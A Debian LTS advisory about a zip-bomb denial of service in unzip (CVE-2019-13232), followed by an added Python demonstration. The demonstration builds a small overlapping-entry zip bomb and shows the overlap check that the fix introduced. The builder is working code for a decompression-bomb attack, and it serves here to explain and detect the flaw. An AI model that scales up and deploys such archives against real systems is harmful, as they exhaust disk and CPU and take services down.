-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Package        : unzip
Version        : 6.0-16+deb8u4
CVE ID         : CVE-2019-13232
Debian Bug     : 931433
David Fifield discovered a way to construct non-recursive "zip bombs" that
achieve a high compression ratio by overlapping files inside the zip
container: every entry's compressed stream shares one compressed "kernel",
so the kernel is decompressed once per entry. The output size therefore
increases quadratically in the input size, reaching a compression ratio of
over 28 million (10 MB -> 281 TB) at the limits of the zip format.
Extracting such an archive can cause a denial of service through disk and
CPU exhaustion.

Mark Adler provided a patch that makes the unzip program detect and reject
such zip files by checking that entries do not overlap.

For Debian 8 "Jessie", this problem has been fixed in version 6.0-16+deb8u4.

We recommend that you upgrade your unzip packages.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be found
at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAl0iUXFfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7
UeSNmg//aYlnFC/oldyGW2Y3fDNrE+BDvUVsa692Y2H6g1AIqzHCtMBlRd4ZHU7A
80ebCNDQOuZSrG5MhadlxfpKhMbLzlwYjxEGbl/q7b6wKmj6Zs0JoRkR+gkTuyiv
ivHSe9wBmsWK0dXjw++8agoK2XPBDSVfCMEsFhpOM07dsE0gEU0p5Z3Dziefqfi8
HE3xotd3pp8SzM+0nBiOpVyC6ZdvIlrw5LuF+aTADBclAmuDna6JJnyz1D72auHT
il9kjbqoSCD0mL/iDYXvRuGanRNAN7UIc+rrCWNn/DsYpX7A+o+cncvLK2lKxmZP
1EuQIwh1U6lfiBd4ipvFkGdt4pzHnBsdQc4Z3oFEbEqLqhNZpzzFcIuc4KIxRHkt
KQGjEzQ4desb/MdtD05RmmmHZu3axpuZIyKzrc2t8XIR69KQpDOufHOYfVWc0Iok
ZloyyVmTDOxOoP/TIk5UNXPhHJ0G6MwRxIMKdj2x5g9kswlBAa/67KFqrt9FZ3Ng
MqQH1/fLgGsUJhUyANJHApb6+OoxsNg03MeP59BosXr79X9BbNaTOIh9TdCjklRH
yJzUjg9A6B/b0wiIEMrUvf5IsXCJo1jIiss0a3gCcGPZWdJQGNDKm553PE9EjjzP
zOtJOHCjKbhOwVIHkb3sUTPAc+mTMoiJa/YhbeKl/cW+0jXizmQ=
=197w
-----END PGP SIGNATURE-----
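The construction the advisory describes, reduced to a runnable demonstration. This is an added example; it is not taken from the advisory, from David Fifield's code, or from Mark Adler's unzip patch. It builds a four-entry quoted-overlap archive in the spirit of Fifield's technique (one shared deflate kernel, each entry's stream quoting the next entry's local header with a stored block), confirms that every entry is spec-valid (CRC and sizes match), and then applies a simplified form of the overlap check that the unzip fix introduced, computed from the central directory. The entry names, the 1 MiB zero kernel and all helper names are constructed for the example; ZIP64 archives are not handled.

```python
import io
import struct
import zipfile
import zlib

# Plain 32-bit ZIP structures, little-endian (ZIP64 is deliberately not handled here).
LFH_SIG, CDH_SIG, EOCD_SIG = 0x04034B50, 0x02014B50, 0x06054B50
DEFLATED = 8


def local_header(name, crc, csize, usize):
    # sig, version needed, flags, method, mtime, mdate, crc32, csize, usize, fnlen, extralen
    return struct.pack("<IHHHHHIIIHH", LFH_SIG, 20, 0, DEFLATED, 0, 0,
                       crc, csize, usize, len(name), 0) + name


def central_header(name, crc, csize, usize, offset):
    # sig, made by, needed, flags, method, mtime, mdate, crc32, csize, usize, fnlen,
    # extralen, commentlen, disk, internal attrs, external attrs, local header offset
    return struct.pack("<IHHHHHHIIIHHHHHII", CDH_SIG, 20, 20, 0, DEFLATED, 0, 0,
                       crc, csize, usize, len(name), 0, 0, 0, 0, 0, offset) + name


def stored_block(payload):
    """A non-final DEFLATE stored block: the inflater copies payload through verbatim."""
    assert len(payload) <= 0xFFFF
    return b"\x00" + struct.pack("<HH", len(payload), len(payload) ^ 0xFFFF) + payload


def build_overlapping_zip(n_entries, kernel_plain):
    """Quoted-overlap bomb in miniature (constructed example): one deflate kernel is
    shared by every entry. Entry i's compressed stream is a stored block quoting entry
    i+1's local header followed by entry i+1's stream, so all streams end on the same
    byte and the archive inflates to roughly n_entries * len(kernel_plain) bytes."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)     # raw deflate, ends in a final block
    data, plain = comp.compress(kernel_plain) + comp.flush(), kernel_plain
    names = [b"%d.bin" % i for i in range(n_entries)]
    entries = []                                       # (name, crc, csize, usize, lfh), last first
    for i in range(n_entries - 1, -1, -1):
        lfh = local_header(names[i], zlib.crc32(plain), len(data), len(plain))
        entries.append((names[i], zlib.crc32(plain), len(data), len(plain), lfh))
        if i > 0:                                      # stream_{i-1} = quote(lfh_i) + stream_i
            data, plain = stored_block(lfh) + data, lfh + plain
    entries.reverse()
    body = entries[0][4] + data                        # LFH_0 + stream_0 is the whole archive body
    cd, offset = b"", 0
    for name, crc, csize, usize, lfh in entries:
        cd += central_header(name, crc, csize, usize, offset)
        offset += len(lfh) + 5                         # next LFH follows the 5-byte stored-block header
    eocd = struct.pack("<IHHHHIIH", EOCD_SIG, 0, 0, len(entries), len(entries), len(cd), len(body), 0)
    return body + cd + eocd


def build_benign_zip():
    """Ordinary two-file archive for comparison, written by the standard library."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("a.txt", b"hello " * 1000)
        zf.writestr("b.txt", b"world " * 1000)
    return buf.getvalue()


def entry_data_start(zip_bytes, zi):
    # Name/extra lengths come from the *local* header; they need not match the central directory.
    fnlen, exlen = struct.unpack_from("<HH", zip_bytes, zi.header_offset + 26)
    return zi.header_offset + 30 + fnlen + exlen


def find_overlaps(zip_bytes):
    """Simplified form of the check the unzip fix adds: derive each entry's byte span
    (local header + compressed data) and flag any entry that starts inside another
    entry's span or whose data runs into the central directory."""
    zf = zipfile.ZipFile(io.BytesIO(zip_bytes))       # parses only the central directory
    cd_start = struct.unpack_from("<I", zip_bytes, zip_bytes.rfind(b"PK\x05\x06") + 16)[0]
    spans = []
    for zi in zf.infolist():
        if struct.unpack_from("<I", zip_bytes, zi.header_offset)[0] != LFH_SIG:
            raise ValueError(f"{zi.filename}: local header signature missing")
        spans.append((zi.header_offset, entry_data_start(zip_bytes, zi) + zi.compress_size, zi.filename))
    spans.sort()
    flagged, high = [], 0
    for start, end, name in spans:
        if start < high or end > cd_start:
            flagged.append(name)
        high = max(high, end)
    return flagged


def verify_crcs(zip_bytes, limit=1 << 24):
    """Inflate every entry with raw zlib (not ZipFile.read, which current CPython refuses
    for overlapped entries) and confirm the claimed CRC and size: the bomb is spec-valid."""
    zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    for zi in zf.infolist():
        start = entry_data_start(zip_bytes, zi)
        raw = zip_bytes[start:start + zi.compress_size]
        plain = raw if zi.compress_type == zipfile.ZIP_STORED else zlib.decompressobj(-15).decompress(raw, limit)
        if len(plain) != zi.file_size or zlib.crc32(plain) != zi.CRC:
            return False
    return True


def claimed_ratio(zip_bytes):
    """Total uncompressed size advertised by the central directory over the archive size."""
    zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    return sum(zi.file_size for zi in zf.infolist()) / len(zip_bytes)


if __name__ == "__main__":
    bomb = build_overlapping_zip(4, b"\0" * (1 << 20))      # constructed input: 4 entries, 1 MiB kernel
    for label, z in (("benign", build_benign_zip()), ("bomb", bomb)):
        print(f"{label}: {len(z)} bytes, ratio {claimed_ratio(z):.0f}x, "
              f"crcs ok={verify_crcs(z)}, overlapping={find_overlaps(z)}")
```

Running it reports no flagged entries for the benign archive and flags 1.bin, 2.bin and 3.bin in the bomb, each of which starts inside 0.bin's span even though every entry inflates to its advertised CRC and size. The check is cheap because it needs only the central directory and the local header lengths, which is why it can run before any data is extracted; an unpatched unzip would instead inflate the shared kernel once per entry. Current CPython's zipfile applies a similar rule and raises BadZipFile when such an entry is opened, which is why verify_crcs inflates with zlib directly.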
